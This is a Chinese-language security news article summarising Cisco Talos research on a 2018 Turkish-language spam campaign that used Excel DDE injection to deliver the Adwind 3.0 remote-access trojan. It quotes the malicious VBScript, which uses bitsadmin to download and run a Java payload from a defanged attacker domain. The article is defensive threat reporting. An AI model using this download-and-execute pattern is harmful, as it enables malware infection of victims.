> 网络安全信息安全_黑客技术知识培训_网络安全资讯新媒体_E安全
首页 最新 国内 国际 数据泄露 网络战 行业 报告 观点 预警 最新 安全意识 人工智能 招聘 云计算 大数据 程序员 系统 专家 融资 人物

远程访问木马Adwind 3.0再现,瞄准Linux、Windows等主流操作系统

  • E安全资讯来源-黑客视界
  • 黑客视界
  • /
  • 预警
  • /
  • 2018-09-26

远程访问木马Adwind 3.0再现,瞄准Linux、Windows等主流操作系统-E安全    

思科Talos团队于本周一(9月24日)发布的一篇博文中指出,他们与ReversingLabs最近发现了一场新的垃圾电子邮件活动,该活动正在分发Adwind 3.0远程访问木马(RAT),而目标是三大桌面操作系统Linux、Windows和Mac OSX。

根据Talos团队的说法,这场新的垃圾电子邮件活动最初是由ReversingLabs于9月10日发现的,攻击者使用了Microsoft Excel动态数据交换(DDE)代码注入攻击来感染目标。最终的payload被证实是Adwind RAT的一个变种,而这个变种(即Adwind 3.0)已经升级为能够绕过恶意软件拦截软件的检测。

垃圾电子邮件活动分析

思科Umbrella遥测显示,这场活动开始于2018年8月26日,并在8月28日达到峰值。

远程访问木马Adwind 3.0再现,瞄准Linux、Windows等主流操作系统-E安全    

Umbrella还显示,75%的请求来自土耳其。但这并没有让Talos团队感到惊讶,因为所有这些垃圾电子邮件均是采用土耳其语编写的。一些目标也位于德国,考虑到德国有一个重要的土耳其社区,这也就不奇怪了。

以下是一封垃圾电子邮件示例,攻击者试图通过一封关于鞋子成本的电子邮件来引诱潜在受害者。

远程访问木马Adwind 3.0再现,瞄准Linux、Windows等主流操作系统-E安全    

在上面的垃圾电子邮件示例中,我们可以看到一个CSV文件附件。Talos团队表示,还有一些垃圾电子邮件的附件使用的是带有.XLT扩展名的文件。

Microsoft Excel dropper

正如上面所提到的那样,这场活动至少涉及到两种不同版本的dropper,它们分别使用.csv或.xlt扩展名,默认情况下由Microsoft Excel打开。两个版本的dropper的目的都是利用DDE代码注入技术来下载Adwind 3.0。虽然这种注入技术是众所周知的,但Talos团队表示,在他们撰写博文时,被注入的Adwind 3.0仍未被恶意软件拦截软件检测出来。

进一步的分析表明,dropper文件可以是下表中的任何扩展名。在默认情况下,虽然并非所有的文件类型都将由Microsoft Excel打开,但仍然可以通过一个带有这些扩展名之一作为参数的脚本来启动Microsoft Excel,以打开对应的文件。

远程访问木马Adwind 3.0再现,瞄准Linux、Windows等主流操作系统-E安全    

在这场活动中,注入代码的目的是使用以下内来创建和执行一个VBScript脚本:

Set WXWYKNRG = CreateObject("Wscript.Shell")

WXWYKNRG.Run "cmd /c bitsadmin /transfer 8 /download hxxp://erayinsaat[.]live %temp%\NMUWYTGO.jar&%temp%\NMUWYTGO.jar",0,True

该脚本将使用bitasdmin(微软提供的一种工具,用于下载或上传作业并监控其进度)获取最终的payload。这个payload是一个Java归档文件。

Java payload

Java代码包含一个名为“Allatori Obfuscator version 4.7”的代码混淆器。

远程访问木马Adwind 3.0再现,瞄准Linux、Windows等主流操作系统-E安全    

Talos团队将经过混淆处理的恶意软件识别为Adwind RAT v3.0。Adwind是一众所周知的多平台RAT,可能有多种配置。Talos团队表示,他们测试的样本被配置为在Windows、Linux和Mac OSX上实现持久性。

Adwind v3.0已经被多个恶意组织所使用过。它允许攻击者执行任何类型的命令、记录击键、捕获屏幕截图、拍照或传输文件。在过去,它曾被用于开展加密货币挖掘活动,并专注于航空业。

合作伙伴 更多